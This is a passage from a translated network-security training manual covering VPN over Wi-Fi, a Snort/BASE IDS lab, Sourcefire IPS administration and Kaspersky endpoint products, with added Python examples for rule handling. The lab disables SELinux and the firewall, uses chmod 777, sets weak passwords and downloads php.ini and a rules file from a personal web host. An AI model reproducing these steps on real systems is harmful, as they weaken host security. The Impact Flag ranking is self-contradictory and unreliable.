Save all the settings; I then try connecting to this Access Point from a computer with Wi-Fi.



- Use the built-in Windows tool to search for wireless network SSIDs. I see the network with SSID VNEXPERTS.NET; press Connect, type the key set earlier, and the wireless connection is complete.
- But after connecting you will certainly still have no Internet access.

Entering the access key


Connection completed

Configuration on the Windows Server 2003 machine


In the previous part of this article I presented in detail how to set up a Windows Server 2003 machine as a VPN server, through the following basic steps:

- Set the IP addresses of the server's two network cards
- Enable the Routing and Remote Access feature
- Create a User and a Group, and allow the Group to access the VPN
- Create a Remote Access Policy allowing VPN connections
- Assign virtual IP addresses to the VPN connections.

Set the IP addresses of the server's two network cards as below, following the first figure of this article:
- The card facing the Internet gets a Gateway
- The card facing the internal network does not need a Gateway

Enable the Routing and Remote Access feature

Start, then press Next; in the next window choose Custom Configuration and select as in the figure below:
The system asks whether to start this service; press Yes to complete the process


Create the User and Group allowed to access the VPN

- My server is a Domain Controller (this is not required; if the server is not a DC you still create the user and Group in the usual way). Here I create a user named vnexperts.net with the password 123456


- Click the Dial-in tab and check the settings as below; then it is OK


Then create a Group named VPN and add the user vnexperts.net to this group to complete this step.
Create a Remote Access Policy so that the server becomes a VPN server
- The purpose of this step is to allow a Group to make VPN connections.
Right-click Remote Access Policy and choose New Remote Access Policy


Choose Custom and type the name of the Remote Access Policy

Press Next; the system asks for the condition under which connections are allowed; press Add and choose Windows Group
Press Add again to add the Group you allow to make VPN connections to this server.


Add the Group VPN to allow access

Press OK to continue the process

- Choose Grant to allow access, press Next and then Finish


Assign IP addresses to the VPN connections

- Right-click the server and choose Properties
- Switch to the IP tab and choose the Static Address Pool option
- Press Add to assign an IP address range to the VPN connections; here I choose the range 10.69.69.200 - 10.69.69.250 for machines connecting over VPN to this server.


Press OK to complete the entire configuration on the Routing and Remote Access server.
c. Creating the VPN connection from devices connecting over Wi-Fi
- In step 1 you connected successfully to a Wi-Fi network; without the VPN solution, your Access Point would be plugged directly into the ADSL modem and connected clients could reach the Internet. But that is not secure, because the traffic is encrypted only once, with WPA using the AES-TKIP algorithm. Here you can also use WEP encryption to support clients that do not support WPA.
- In this solution, after connecting to Wi-Fi you must also connect to the VPN before you can reach the Internet. With VPN applied, each packet is encrypted twice: first with WPA, then at the IP layer with PPTP or IPsec.

- Creating the VPN connection on the Wi-Fi client, done on Windows XP Professional

- Start / Control Panel / Network Connections / choose New Connection Wizard
In the first window press Next to continue.

Choose the VPN connection type, press Next to continue


Select VPN connection

Choose a name for the connection; I choose VNEXPERTS.NET


For the IP address of the VPN server I type 192.168.50.1, the address of the VPN server I configured earlier. Press Next to complete the process

The VPN connection on the Wi-Fi client computer is now created


Connecting
- Double-click the connection just created, enter the user vnexperts.net (a member of the VPN group, which is allowed to connect over VPN) for the VPN server 192.168.50.1, and press Connect

Authentication process


Check: open the website vnexperts.net, and the result is excellent

In this article I introduced a solution for securing Wi-Fi connections. When a system includes servers holding highly important data, many businesses do not dare to deploy a wireless solution. But with VPN applied to the wireless connections you can fully trust it, because the system is encrypted at two layers.
10. Intrusion detection and prevention systems (IDS/IPS)
a. Packet analysis principle
When a packet enters a Sourcefire device it is processed through the following steps:


When a packet is captured by the Sourcefire device it is:

- Decoded by Sourcefire's Decoders component
- Then passed into the Preprocessors stage
- Then compared against the set of Rules in use
- The process produces a database of Events
- Events can be filtered into different Event types. Based on the Events generated, further tasks can be performed.

Understanding the network traffic analysis process


An Event has the following content:

Note: Impact Flag is a feature combining IPS and RNA that assesses the risk level of an attack. The most dangerous level is Flag 1, followed by 2, 3, 4; the lowest-risk level is Flag 1.
Packet processing and decoding


This stage decodes the packet starting from Layer 2

After decoding, the Sourcefire device continues with the Preprocessors stage and the comparison against the Rule set

Events are generated from these stages


b. Installing and configuring Snort as an IDS/IPS

Prepare install
This is the step of preparing the operating system, the libraries and the installers
Install
This is the step of installing and configuring Snort and the related services.
NOTE_1: Boot the Fedora Core 10 virtual machine and revert to the Origin snapshot. Log in to Fedora with user root and password yeuemnhieu
NOTE_2: Read each line carefully: lines beginning with "#" are explanation, lines without # are commands.
NOTE_3: Lines in italics are command lines that must be run
NOTE_4: After logon or reboot, set the IP address with the commands:
ifconfig eth0 192.168.0.x/24
route add default gw 192.168.0.1
echo "nameserver 208.67.222.222" > /etc/resolv.conf

If there is no eth0, use eth1

Prepare Install
Update the OS with the command:
yum update
Install the libraries Snort needs:
yum install iptables-devel libpcap libpcap-devel pcre pcre-devel pcre-lib php php-common php-gd php-cli php-mysql flex bison mysql mysql-devel mysql-bench mysql-server gcc gcc-c++
Create the directories that hold Snort on the system:
mkdir /etc/snort
mkdir /etc/snort/log
Copy the installers to /root/Desktop
The installers are: Snort-2.8.5.tar.gz, Snortrule...tar.gz, base-1.4.4.tar.gz and adodb, placed in /root/Desktop. If they are already on the Desktop after logon, that is fine


Installing Snort
Disable SELinux
SELinux is a service similar to UAC on Windows; because we run many commands in a row, this Fedora feature must be disabled.
---> Go to System --> Administration --> SELinux Management, disable it, and follow these steps:
- disable SELinux
- restart the machine
- check that SELinux is disabled
- set the IP address
Services
To install Snort some services must be stopped and started; for example, if IPTABLES is enabled, no data can be captured, so the machine cannot act as an IDS. The services to handle are:
- stop iptables
- start mysqld
- start httpd
The commands that configure these services are:
/etc/init.d/iptables stop
/etc/init.d/mysqld restart
/etc/init.d/httpd restart
Install Snort

Extract and install Snort
Install Snort with the commands below:
cd /root/Desktop
tar xzvf snort-2.8.5.tar.gz
cd snort-2.8.5
./configure --with-mysql && make && make install
cd /etc/snort
tar xzvf /root/Desktop/snortrules-snapshot-CURRENT.tar.gz
Configure Snort
Go to the directory /etc/snort/etc and copy all of its files out to /etc/snort
Configure the file /etc/snort/snort.conf:
- Double-click the file to open it in the text editor and edit:
+ Line 194: set the rule path to /etc/snort/rules
+ Lines 259 and 260: add # at the start of the line (the free Snort build supports only one detection option)
+ Line 829: remove the # at the start of the line. Set: user snort; password snort; database snort; host localhost (this line configures the MySQL login used by Snort).
Install and configure the MySQL database (my root user has password=123456)
MySQL configuration commands:
mysql
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to snort@localhost;
SET PASSWORD FOR snort@localhost=PASSWORD('snort');

grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to root@localhost;
SET PASSWORD FOR root@localhost=PASSWORD('123456');
create database snort;
quit
cd /root/Desktop/snort-2.8.5/schemas
mysql -u root -p snort < create_mysql
When prompted for the password, type 123456 and press Enter
Install BASE and ADODB
ADODB is the layer that reads the data out of MySQL; BASE is the web application that displays the data ADODB provides.
Installation commands:
cd /var/www/html
tar xzvf /root/Desktop/base-1.4.4.tar.gz
cd /var/www/html/base-1.4.4
tar xzvf /root/Desktop/adodb4991.gz
chmod 777 /var/www/html/base-1.4.4/
chown apache /var/www/html/base-1.4.4/
chgrp apache /var/www/html/base-1.4.4/
/etc/init.d/httpd restart


Access the BASE configuration through the web

- Edit the file /etc/php.ini
+ php.ini is PHP's configuration file; by default this file is broken, so delete it and download it again with the commands below:
rm /etc/php.ini -f
cd /etc
wget http://tocbatdat.googlepages.com/php.ini
+ After the download into /etc the file's name will have been changed, so we must rename it back to php.ini
+ Restart the web service with the command:
/etc/init.d/httpd restart
- Configure BASE
+ In Firefox open: http://localhost/base-1.4.4
Step 1: press Continue
Step 2: set the ADODB path: /var/www/html/base-1.4.4/adodb
Step 3: set the SQL login:
Database: snort
Host: localhost
User: snort
Pass: snort
Step 4: set the administrator account: User: snort; password: snort



Step 5: Create BASE
Step 6: OK
- Configure from step 1 to step 5
Run SNORT
To test whether Snort runs, we download an exploit.rules file from my website with the commands below:
Note: after downloading, go into the directory and rename the file:
rm /etc/snort/rules/exploit.rules -f
cd /etc/snort/rules
wget http://tocbatdat.googlepages.com/exploit.rules
After the download the file's name will have been changed, so we must rename it back to exploit.rules
After renaming, run Snort with the command:
snort -v -c /etc/snort/snort.conf -l /etc/snort/log
5. View and test the results
Use Firefox to open:
http://localhost/base-1.4.4
Try pinging outside with packets larger than 800 bytes using the command
ping 192.168.0.1 -s 888
Troubleshooting
If Snort does not run: 1. Re-read the NOTEs. 2. Re-check parts 1-5 of part II, installing SNORT:
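The snort.conf edits above are given by line number (194, 259/260, 829), which only holds for the exact snort.conf shipped with that Snort release. The following added example (mine, not part of the lab) applies the same three edits by pattern, so they survive a different file layout and can be re-run safely. The sample configuration is constructed to resemble Snort 2.8 defaults; the assumption that lines 259/260 are the two `dynamicdetection` lines is mine.

```python
"""Apply the lab's snort.conf edits by pattern rather than by line number.

Added example (not part of the original lab). SAMPLE_SNORT_CONF is a
constructed excerpt resembling Snort 2.8 defaults; the mapping of the lab's
line numbers to these directives is an assumption.
"""
import re

# Constructed sample of the relevant snort.conf lines (not a file from the lab).
SAMPLE_SNORT_CONF = """\
# Step #1: Set the network variables
var HOME_NET any
var RULE_PATH ../rules
# Step #2: Configure dynamic loaded libraries
dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/
dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so
dynamicdetection directory /usr/local/lib/snort_dynamicrules
dynamicdetection file /usr/local/lib/snort_dynamicrules/sid.so
# Step #4: Configure output plugins
# output database: log, mysql, user=root password=test dbname=db host=localhost
include $RULE_PATH/local.rules
"""


def configure_snort_conf(text, rule_path, db_user, db_pass, db_name, db_host):
    """Return the edited configuration text.

    Three edits, mirroring the lab: point RULE_PATH at the rules directory,
    comment out the dynamicdetection lines (only one detection option is
    supported in the free build), and enable the MySQL output plugin with
    the given credentials. Running it twice yields the same text.
    """
    out = []
    for line in text.splitlines():
        if re.match(r"^\s*var\s+RULE_PATH\s", line):
            line = f"var RULE_PATH {rule_path}"
        elif re.match(r"^\s*dynamicdetection\b", line):
            line = "# " + line
        elif re.match(r"^\s*#\s*output database:\s*log,\s*mysql", line):
            line = (f"output database: log, mysql, user={db_user} "
                    f"password={db_pass} dbname={db_name} host={db_host}")
        out.append(line)
    return "\n".join(out) + "\n"


def check_snort_conf(text):
    """Report the three settings as they would take effect (None when absent)."""
    rule_path = None
    dyn_active = 0
    db_line = None
    for line in text.splitlines():
        m = re.match(r"^\s*var\s+RULE_PATH\s+(\S+)", line)
        if m:
            rule_path = m.group(1)
        if re.match(r"^\s*dynamicdetection\b", line):
            dyn_active += 1
        if re.match(r"^\s*output database:\s*log,\s*mysql", line):
            db_line = line.strip()
    return {"rule_path": rule_path, "active_dynamicdetection": dyn_active,
            "db_output": db_line}


if __name__ == "__main__":
    edited = configure_snort_conf(SAMPLE_SNORT_CONF, "/etc/snort/rules",
                                  "snort", "snort", "snort", "localhost")
    print(edited)
    print(check_snort_conf(edited))
```

To use it on the real file, read /etc/snort/snort.conf into `text`, write the returned string back, and run `check_snort_conf` on the result before starting Snort; the `-T` self-test of Snort is still the final word on whether the file parses.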

11. Installing and configuring Sourcefire IPS

a. Features of the Sourcefire IPS system
The IPS system is designed to detect and prevent attacks and potential information-security threats from outside against the DMZ or server farm of VNPT Hanoi.
The RNA feature complements IPS/IDS by providing a network profile (OS, services, open ports, vulnerabilities, host statistics). Combined with IPS/IDS, it automatically configures and tunes the Rules.
Specific feature requirements for the IPS system at VNPT Hanoi
| Feature | Description |
| --- | --- |
| IPS feature protecting the network zones | Detect external attacks such as worms, Trojans, buffer overflows, DoS attacks, backdoor attacks, spyware, port scans, VoIP attacks, IPv6 attacks, statistical anomalies, protocol anomalies, P2P attacks, blended threats and zero-day attacks against the service servers. Rules can be set to block attacks, or an automatic tuning mode chosen according to the services. Produce reports on attacks and security vulnerabilities. |
| IDS feature detecting attacks in the VLANs set up for monitoring | Detect and report attacks, security threats and vulnerabilities of the servers and services in the monitored VLANs. Detect attacks and security threats originating from users. When an attack from outside against hosts in the monitored zone occurs, the IPS feature on the device can be enabled to protect those hosts and block the external attack into those zones. |
| Real-time monitoring and alerting (Real-time Network Awareness, RNA) | RNA detects network security risks: network profile (OS, services, open ports, vulnerabilities, host statistics). RNA combines with IPS/IDS to automatically enable/disable the rules needed to protect the network. The Passive Scan feature lets RNA detect network security risks without affecting network capacity. |
| IT policy compliance | Issue alerts on security policy violations. A violation may be a dangerous attack in progress or an incident involving a server or a service. Alerts can be sent by Email, SNMP or SYSLOG. |


b. Typical IDS/IPS deployment model

Analysis of Sourcefire's typical model

Sourcefire has two product lines: Sourcefire Defense Center is the centralized management device, and Sourcefire 3D Sensor is the sensor line providing the IPS/IDS features.
When deployed in a system, Sourcefire can operate Inline (IPS) or Passive (IDS), and can detect and block attacks and network security threats.
Events from the Sensors are forwarded to the central management device.


c. Operating principle of the Sourcefire IDS/IPS system

General principle

Component diagram and operating principle

The operating principle and components of a Sourcefire sensor are explained through the following example:
A Sourcefire 3D Sensor 3D3500 has 8 Ethernet ports that perform sensing:
Interface Sets:
+ These ports are grouped into different Interface Sets. In the figure, 3 Interface Sets have been created
+ Interface Sets are created in two modes, Passive and Inline (Inline, and Inline with Fail Open)
Detection Engine: performs monitoring on the Interface Sets (like gatekeepers). In the figure two Detection Engines are created and perform monitoring on the Interface Sets. There are 3 types of Detection Engine: IPS, RNA, RUA
Policy: the policy applied to each type of Detection Engine. An Intrusion Policy applies to the IPS Detection Engine; a Detection Policy applies to RNA.

Page | 115 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

Diagram explaining the operating principle of the Sourcefire IDS/IPS.


[Document: Information Security Training for ABC, June 2012]

Step 1: The sensing ports on the Sourcefire 3D Sensor are grouped into Interface Sets. The model above creates Interface Sets in Inline mode.
Step 2: On these Interface Sets, Detection Engines are created to perform monitoring.
Step 3: For the Detection Engines to operate, policies must be built and applied to them.
Step 4: When a Detection Engine blocks traffic or detects a security threat, it produces Events.
d. Setting the management parameters of the Sourcefire devices
Connecting the management cable of the devices
On Sourcefire 3D Sensor devices the management port is Eth1, at the back of the device.
On the Sourcefire DC the management port is Eth1, at the back of the device.
The management cables are clearly labelled and must be prepared before installing the devices.
Prepare the cables for the sensing ports as in the deployment model above.
Setting the basic parameters of a Sourcefire device
+ Name the device according to the VNPT HN plan.
+ IP address
+ Administrator password
- The device's default IP address is 192.168.45.45; open the web interface at https://192.168.45.45 with User: admin and Password: Sourcefire
The screen shown at first login lets us reset the basic parameters of the Sourcefire device


e. Upgrading the Sourcefire devices

- Sourcefire supports automatic updates, or the administrator can upload an update package downloaded from the Sourcefire support site (the administrator can ask the distributor to supply these updates; an account for the support site is provided only when the customer has attended and obtained the certificate of a training course provided by Sourcefire).

f. Configuring the system settings

- This is the most general system configuration of the Sourcefire device, such as IP address, Time, License and shutdown/restart

To operate and administer the Sourcefire IPS system, one must know how to check the system information against the design and change the system settings to meet the requirements.

The administrator operating the Sourcefire IPS system must monitor, and may change, the following system information:

Information
The most general information about the Sourcefire device.


Device name, Model, Version, IP address. Importantly, it shows which Policies are applied to the device.
- Allows the administrator to change the device name

License
Where the License of the Sourcefire device is viewed and managed


Network
- Allows the administrator to view and set the IP, DNS, Proxy and Hostname of the Sourcefire device.

Every Sourcefire device deployed at VNPT Hanoi has its IP address and device name set

Network Interface
Allows the administrator to configure the management port


Process
The administrator can open the Process item to issue commands such as Shutdown, Reboot or Restart on the Sourcefire device

Remote Management
The administrator can centrally manage the Sourcefire devices as laid out in the design document: the DC1500 device manages 2 Sensor 3D3500 devices
- The devices work together through:
+ IP
+ Port (configured by the administrator)
+ Key (set by the administrator as a pre-shared key)

The detailed configuration steps can be found in the deployment document

Time
Allows the time of the device to be set
There are also some other settings, such as netflow device, Storage and Health blacklist


g. Setting up centralized management of the Sourcefire devices

The Sourcefire solution uses the Sourcefire DC device to manage the Sourcefire 3D Sensor devices. Every setting of a Sourcefire 3D Sensor can be made from the Sourcefire DC.
At VNPT Hanoi, after centralized management of the Sourcefire devices is set up, all configuration is done on the Sourcefire DC1500.
Sourcefire's centralized management model
[Figure: Management VLAN; two Sourcefire 3D3500 Sensors and the Sourcefire DC1500 connected through a switch via their Mgt_port]

The Sourcefire DC1500 device manages the Sourcefire devices in the system
The Sourcefire 3D Sensors perform sensing and are managed by the Sourcefire DC1500
Configuration steps
Configuring centralized management of the Sourcefire devices must be done on both the Sourcefire DC and the Sourcefire 3D Sensor.
On the Sourcefire 3D Sensor, set which DC manages it, using (IP, Port, Registration Key).
On the Sourcefire DC, add the Sensor, using (IP, Port, Registration Key).
On the 3D Sensor
+ Open each Sourcefire 3D Sensor: Operations > System Settings > Remote Management > Add Manager (the default management port is 8305)
+ Set the IP address of the managing device, the DC1500: 10.10.42.120

+ Set the Registration Key (the secret shared between the devices): vthn123
+ Press Save. Do the same on all 3 Sourcefire 3D Sensor devices

On the Sourcefire DC1000

Open the DC1000: Operations > Sensor
Enter the IP address of the 3D Sensor in Host and the registration key vthn123, then press Add


After the management setup is complete, open the DC1500 at Operations > Sensor to see the managed devices. (Here the example is one DC managing 3 3D Sensors)

h. Configuring Interface Sets and Detection Engines

Configuring Interface Sets
Interface Sets are groups of sensing ports on the Sourcefire 3D Sensor. The administrator can group interfaces into an Interface Set.
Interface Sets come in these types:
+ Passive: operates as an IDS
+ Inline: operates as an IPS
+ Inline with Fail-Open: operates as an IPS, but if the device fails the network is not interrupted.
On the DC1500 go to Operations > Detection Engine > Interface Sets. Choose the name, the type and the Sourcefire 3D Sensor on which the set is created.


Configuring Detection Engines

There are 3 types of Detection Engine: IPS, RNA and RUA. Because VNPT Hanoi bought only the IPS and RNA licenses, only these 2 types can be created.
+ The IPS Detection Engine detects and blocks network attacks
+ RNA builds the Network Profile
+ RUA detects and maps IP addresses to users.
Each Interface Set can have several types of Detection Engine created to monitor it.
Detection Engines are the engines that monitor the Interface Sets; the administrator can check whether the Detection Engines are correctly applied to the Interface Sets.
Detection Engines can be modified by the administrator


Interface for changing the Detection Engines applied to the Interface Sets


i. Managing and setting policies for the IPS

This is a very important part of managing and operating the Sourcefire IPS. All policy settings for the Detection Engines are made here.
The administrator can create security policies; when a security violation occurs, the action appropriate to that violation is taken.

The policy management section has the following main items:

Managing IPS
Managing RNA
Managing security policies


Managing IPS
Managing IPS includes setting policies for the Detection Engines, managing the Rules, managing SEU updates and some other features

Managing Intrusion Policies

An Intrusion Policy is a policy applied to one or more Detection Engines.
An Intrusion Policy sets the following parameters:
+ The name of the Policy
+ The Base Policy applied (3 levels: connectivity over security, balanced connectivity and security, security over connectivity). At VNPT Hanoi the balanced level is recommended.
+ Which Sensor or Detection Engine this Policy applies to, i.e. is directly affected by it.
+ In this Policy, how many Rules are enabled and how many are in each mode: alert only (Generate Events) and block and alert (Drop and generate events).
Below is the general information of an Intrusion Policy applied to the Detection Engine of the DMZ zone of VNPT Hanoi


The administrator can manage the security level based on the vendor's recommendations, with three levels:
+ (High) Security over connectivity; (Lower) Connectivity over security; and (Normal) Balanced security and connectivity


The administrator can view and change the Detection Engines governed by this Policy.
The figure below shows this Policy applied to one Detection Engine, the DMZ zone of VNPT Hanoi

The administrator can tune the variables so that the Rules work as effectively as possible, from changing existing variables to defining new ones:
For example, if the HTTP service also uses port 443, we add port 443 to HTTP_PORTS


Sourcefire's full rule set is over 20,000 Rules, updated regularly by importing the SEU automatically from Sourcefire.
For each Intrusion Policy applied to each Detection Engine we can apply a different set of enabled/disabled Rules.
Beyond the Rules enabled and disabled by default, the administrator must analyse the situation and enable or disable Rules to meet the system's security requirements.

When the RNA feature is used to discover the network (active hosts, OS, services, IP, MAC, vulnerabilities), the Sourcefire device can use these results to change the state of the Rules, improving the device's processing performance and reducing unimportant Events.
We can use RNA to recommend the state of the Rules
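The two uses of the host profile described in this chapter, recommending rule states and rating an event with an Impact Flag (the note in section 10.a), come down to the same lookup: does the host the event or rule concerns actually expose the service in question? The following added example (mine, not Sourcefire code) makes both decisions over a constructed host profile and rule set. The host records, the rule metadata and the four-level flag scheme are simplified assumptions; the product derives them from its own profiling and rule metadata, and only the ordering (1 most severe, 4 least) follows the text.

```python
"""Use an RNA-style host profile to recommend rule states and rate events.

Added example, not Sourcefire code. The host records, the rule metadata and
the impact-flag scheme are simplified assumptions made for illustration.
"""
from dataclasses import dataclass, field


@dataclass
class Host:
    ip: str
    os: str                                          # e.g. "windows", "linux"
    services: dict = field(default_factory=dict)     # port -> service ("unknown" if unidentified)


@dataclass
class Rule:
    sid: int
    msg: str
    service: str                 # the service the rule protects, e.g. "http"
    target_os: str = "any"       # "any" or one OS family


# Constructed network profile: what a passive scan might have learned.
PROFILE = [
    Host("172.29.1.18", "linux", {80: "http", 22: "ssh"}),
    Host("172.29.1.20", "windows", {445: "smb", 3389: "unknown"}),
]

# Constructed rule set with the metadata the recommendation needs.
RULES = [
    Rule(1000001, "HTTP request smuggling attempt", "http"),
    Rule(1000002, "SMB null session attempt", "smb", "windows"),
    Rule(1000003, "IMAP login overflow", "imap"),
    Rule(1000004, "RDP brute force", "rdp", "windows"),
]


def recommend_rule_states(rules, hosts):
    """Return {sid: 'enable' | 'disable'}.

    A rule is worth enabling only if some monitored host exposes the service
    it protects on an OS it targets; anything else costs sensor CPU and
    produces events nobody needs to read.
    """
    states = {}
    for r in rules:
        relevant = any(
            r.service in h.services.values() and r.target_os in ("any", h.os)
            for h in hosts
        )
        states[r.sid] = "enable" if relevant else "disable"
    return states


def impact_flag(rule, dst_ip, dst_port, hosts):
    """Rate an event from `rule` against dst_ip:dst_port using the host profile.

    Simplified scheme (assumption; 1 is most severe, 4 least):
      1  target is known and runs the protected service on that port
      2  target is known and the port is open, but the service was not identified
      3  target is known and the port is not open
      4  target is not in the profile at all
    """
    host = {h.ip: h for h in hosts}.get(dst_ip)
    if host is None:
        return 4
    service = host.services.get(dst_port)
    if service is None:
        return 3
    if service == rule.service and rule.target_os in ("any", host.os):
        return 1
    return 2


if __name__ == "__main__":
    print(recommend_rule_states(RULES, PROFILE))
    for sid, ip, port in [(1000001, "172.29.1.18", 80), (1000004, "172.29.1.20", 3389),
                          (1000001, "172.29.1.20", 80), (1000002, "10.0.0.9", 445)]:
        rule = next(r for r in RULES if r.sid == sid)
        print(sid, ip, port, "->", impact_flag(rule, ip, port, PROFILE))
```

The recommendation disables the IMAP and RDP rules because no profiled host runs those services (port 3389 is open on the Windows host but its service is unidentified, which is exactly the case that gets flag 2 rather than 1 when an event does fire).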


This Policy can also be applied to a network range

The Advanced Settings of an Intrusion Policy are an important section that requires the administrator to understand the Sourcefire system deeply before configuring, to avoid affecting the system. By default the vendor populates these Advanced Settings with default values


Policy Layers allow a system to have several layers:

+ The default layer recommended by the vendor
+ A layer changed by the user

After a series of settings the administrator must Commit Changes to close and save the Intrusion Policy configuration.

After saving the Intrusion Policy the administrator must apply it to the Detection Engines; after applying, check whether the process completed successfully


SEU
This is the interface for monitoring which SEU is applied to the Intrusion Policy
The administrator can also update the SEU on the Sourcefire device by downloading the SEU from the Sourcefire website and importing it into the device

Rule Editor
By default Sourcefire has over 20,000 Rules, but the administrator can add new Rules to enforce the security policies of their own system. In the Rule Editor interface the administrator can add Rules, view their content and edit it with specific settings, which allows the Rules to be managed.


For example, at VNPT Hanoi a Rule was added that does not allow Ping packets larger than 800 bytes, because large Ping packets can affect the network
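This is the same rule the Snort lab in section 10 tests with `ping 192.168.0.1 -s 888`, and the packet pipeline described in 10.a (decode, compare against the rules, produce an event) is what decides whether it fires. The following added example (mine, not Snort or Sourcefire code) runs that pipeline over packets constructed in memory: it decodes a raw IPv4/ICMP packet, parses a rule written in Snort syntax with `itype:8` and `dsize:>800`, resolves the `$HOME_NET` variable in the header, and emits an event only for the oversized echo request. The rule text and the `$HOME_NET` value are assumptions written for this example.

```python
"""Decode a raw IPv4/ICMP packet and evaluate a Snort-style rule against it.

Added example, not Snort or Sourcefire code. Packets are constructed inline so
it runs offline; the rule text and the $HOME_NET value are assumptions.
"""
import ipaddress
import re
import struct

# Rule-header variables (constructed for the example).
VARIABLES = {"HOME_NET": "192.168.0.0/24"}

# Alert on ICMP echo requests (itype 8) from HOME_NET carrying more than 800 bytes.
LARGE_PING_RULE = (
    'alert icmp $HOME_NET any -> any any '
    '(msg:"ICMP echo request larger than 800 bytes"; itype:8; dsize:>800; sid:1000001; rev:1;)'
)

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s*->\s*"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)


def parse_rule(text):
    """Split a rule into its header fields and an option dict (msg, itype, dsize, sid, ...)."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised rule syntax")
    rule = m.groupdict()
    opts = {}
    for opt in filter(None, (o.strip() for o in rule.pop("opts").split(";"))):
        key, _, val = opt.partition(":")
        opts[key.strip()] = val.strip().strip('"')
    rule["opts"] = opts
    return rule


def decode_ipv4_icmp(pkt):
    """Decoder stage: return {'proto','src','dst','itype','dsize'} for IPv4+ICMP, else None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if pkt[9] != 1 or total_len > len(pkt) or total_len < ihl + 8:
        return None
    icmp = pkt[ihl:total_len]
    # dsize counts the data after the 8-byte ICMP header, as Snort's dsize does.
    return {"proto": "icmp", "src": str(ipaddress.IPv4Address(pkt[12:16])),
            "dst": str(ipaddress.IPv4Address(pkt[16:20])),
            "itype": icmp[0], "dsize": len(icmp) - 8}


def addr_matches(spec, ip):
    """Resolve a $VAR reference, then accept 'any' or test the CIDR against the address."""
    if spec.startswith("$"):
        spec = VARIABLES[spec[1:]]
    return spec == "any" or ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)


def dsize_matches(spec, dsize):
    op, num = re.fullmatch(r"([<>]?)(\d+)", spec).groups()
    num = int(num)
    return dsize > num if op == ">" else dsize < num if op == "<" else dsize == num


def match(rule, decoded):
    """Rule stage: header (protocol, addresses) plus the itype and dsize options."""
    if decoded is None or decoded["proto"] != rule["proto"]:
        return False
    if not (addr_matches(rule["src"], decoded["src"]) and addr_matches(rule["dst"], decoded["dst"])):
        return False
    o = rule["opts"]
    if "itype" in o and decoded["itype"] != int(o["itype"]):
        return False
    return "dsize" not in o or dsize_matches(o["dsize"], decoded["dsize"])


def build_ping(src, dst, payload_len, itype=8):
    """Constructed IPv4+ICMP packet; checksums are left zero because matching ignores them."""
    icmp = struct.pack("!BBHHH", itype, 0, 0, 0x1234, 1) + b"A" * payload_len
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return ip_hdr + icmp


def events_for(rule_text, packets):
    """Event stage: run the rule over the packets and return (sid, msg, src, dst) tuples."""
    rule = parse_rule(rule_text)
    events = []
    for pkt in packets:
        d = decode_ipv4_icmp(pkt)
        if match(rule, d):
            events.append((int(rule["opts"]["sid"]), rule["opts"]["msg"], d["src"], d["dst"]))
    return events


if __name__ == "__main__":
    pkts = [build_ping("192.168.0.5", "192.168.0.1", 888),           # the lab's ping -s 888
            build_ping("192.168.0.5", "192.168.0.1", 56),            # an ordinary ping
            build_ping("192.168.0.1", "192.168.0.5", 888, itype=0)]  # a large echo reply
    for ev in events_for(LARGE_PING_RULE, pkts):
        print(ev)
```

Only the first packet produces an event: the 56-byte ping fails `dsize:>800`, and the large echo reply fails `itype:8`. Note that `-s 888` sets the ICMP data length, which is exactly what `dsize` measures, so the threshold of 800 is compared against 888, not against the full 916-byte IP datagram.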


Email alert
When a Rule matches, the Sourcefire device sends an alert to the administrator.
The administrator can use the Email Alert feature or a Compliance Policy


Managing RNA
RNA is an advanced Sourcefire feature that discovers the network by a Passive Scan running 24/7.
To manage RNA we need to set up the items below:

Detection Policy
A Detection Policy is the policy applied to the RNA Detection Engines.
The administrator must create this policy and apply it to the RNA Detection Engines so that they discover the network.
Detection Engine management interface

The administrator can tune an RNA Detection Engine by configuring its Detection Policy
Below are the management interface and the settings made during the deployment of the Sourcefire devices


Host Attributes
Set for a network zone
At VNPT Hanoi it is named VNPT Ha Noi and combined with Network Map, a feature of RNA
Network Map
Network Map lets the administrator see the network with the following information:
+ Active hosts: divided by network range
+ OS: details of the operating system


+ The services running on the host
+ The applications
+ The protocols used
+ And the security vulnerabilities of the system
This is the Sourcefire management interface with the RNA Network Map feature for the IP address 172.29.1.18


RNA Detector
The administrator can configure the RNA Detector to enable or disable RNA settings
Services running on the network
The administrator can go to RNA Services to discover which services the system is running and on which machines they run

Service details


Details of the HTTP service, with vendor YTS

Managing the applications running on the network

The administrator can use the RNA Application feature to check the applications running on the network

Management information about the applications in the system

j. Analysing IPS Events

Intrusion Events are designed and detailed in the Report design document.
Intrusion Events cover all IPS Events; the administrator can check and track the number of Events:
+ By time
+ By Detection Engine
+ Filtered by many other criteria


The administrator can filter out the Events needed


12. Endpoint Security

a. The Kaspersky Open Space Security (KOSS) solution
Model of the Kaspersky Open Space Security solution
[Figure: Kaspersky for Mail Server; Kaspersky Internet Gateway; Endpoint Security for File Server; Endpoint Security for Workstation]

The KOSS solution uses the Kaspersky Security Center tool to centrally manage all the security packages in the solution.
KSC supports hierarchical management to fit any network model:


[Figure: Kaspersky Security Center MASTER managing Kaspersky Security Center SLAVE servers, which manage Kaspersky Endpoint Security clients]

b. Features of the Kaspersky Endpoint Security package

The Kaspersky Endpoint Security package for workstations and servers has the following features


Control components:
- Application Startup Control
- Application Privilege Control
- Vulnerability Monitor
- Device Control
- Web Control

Protection components:
- General Protection Settings
- File Anti-Virus
- Mail Anti-Virus
- Web Anti-Virus
- IM Anti-Virus
- System Watcher
- Firewall
- Network Attack Blocker

c. Lab: installing KSC and Endpoint Security on workstations

13. Data Loss Prevention
This is the solution against leakage of internal information, and it comprises a range of measures:
